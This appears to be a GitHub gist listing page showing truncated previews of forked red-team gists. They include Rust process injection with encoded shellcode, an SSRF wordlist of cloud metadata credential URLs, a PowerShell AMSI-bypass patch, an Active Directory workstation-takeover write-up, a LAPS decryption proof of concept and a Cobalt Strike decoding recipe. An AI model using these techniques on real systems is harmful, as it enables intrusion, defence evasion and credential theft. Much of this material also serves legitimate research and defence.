For3stCo1d
For3stCo1d
/ RustProcessInjection102.rs
Created
May 29, 2023 07:29
— forked from OtterHacker/RustProcessInjection102.rs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Rust basic Process injection using OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread | |
| * API dynamic resolution and shellcode XOR encoded | |
| */ | |
| #[allow(non_camel_case_types)] | |
| type HANDLE = *mut u64; | |
| #[allow(non_camel_case_types)] | |
| type LPVOID = *mut u64; | |
| #[allow(non_camel_case_types)] | |
| type DWORD = u32; |
For3stCo1d
/ shitcode.c
Created
May 21, 2023 13:30
— forked from susMdT/shitcode.c
hahaha da shellcode go brrrr
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Core.h> | |
| #include <Win32.h> | |
| #include <Structs.h> | |
| #include <Sleep.h> | |
| #include <Utils.h> | |
| SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance) | |
| { |
For3stCo1d
/ learning_rust.md
Created
April 21, 2023 17:23
— forked from noxasaxon/learning_rust.md
Learn Rust!
For3stCo1d
/ LAPSDecrypt.cs
Created
April 19, 2023 16:15
— forked from xpn/LAPSDecrypt.cs
Quick POC looking at how encryption works for LAPS (v2)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.DirectoryServices.Protocols; | |
| using System.Globalization; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Runtime.InteropServices.ComTypes; | |
| using System.Security.Policy; | |
| using System.Security.Principal; | |
| using System.Text; |
For3stCo1d
/ cloud_metadata.txt
Created
June 7, 2022 14:27
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
For3stCo1d
/ For x64
Created
May 13, 2022 14:10
— forked from michaelder/For x64
Cyberchef Recipe for Cobalt Strike Reflective Loader(beacon) v4
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Regular_expression('User defined','FromBase64String\\("([^"]+)',true,true,false,false,false,false,'List capture groups') | |
| From_Base64('A-Za-z0-9+/=',true) | |
| Gunzip() | |
| Register('([\\s\\S]*)',true,false,false) | |
| Regular_expression('User defined','FromBase64String\\(\'([^\']+)',true,true,false,false,false,false,'List capture groups') | |
| Register('([\\s\\S]*)',true,false,false) | |
| Find_/_Replace({'option':'Regex','string':'.+'},'$R0',true,false,true,true) | |
| Regular_expression('User defined','-bxor (.+)',true,true,false,false,false,false,'List capture groups') | |
| Register('([\\s\\S]*)',true,false,false) | |
| Find_/_Replace({'option':'Regex','string':'.+'},'$R1',true,false,true,true) |
For3stCo1d
/ Workstation-Takeover.md
Created
May 5, 2022 15:17
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
For3stCo1d
/ proc_mem.py
Created
March 13, 2022 04:13
— forked from gamozolabs/proc_mem.py
IDA Python loader for /proc/pid/mem without debugging a process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re, subprocess, idaapi, ida_segment, ida_kernwin | |
| # To install this, simply put it in your ida_install/loaders folder and open | |
| # a `/proc/<pid>/mem` file! | |
| # | |
| # You might need to set `echo 0 > /proc/sys/kernel/yama/ptrace_scope` if you | |
| # want to be able to dump processes depending on your system configuration. | |
| # Check if the file is supported by our loader | |
| def accept_file(li, filename): |
For3stCo1d
/ PowerShell
Created
January 27, 2022 13:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function AmsiBypass | |
| { | |
| #This is Rastamouses in memory patch method | |
| $ztzsw = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class ztzsw { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); |
For3stCo1d
/ windows_hardening.cmd
Created
January 27, 2022 13:17
— forked from ricardojba/windows_hardening.cmd
A Windows hardening script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ::########################################################################################################################## | |
| :: | |
| :: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing, | |
| :: | |
| :: OR BOTH!!! | |
| :: | |
| :: YOU HAVE BEEN WARNED!!!!!!!!!! | |
| :: | |
| :: This script is provided "AS IS" with no warranties, and confers no rights. | |
| :: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section, |
NewerOlder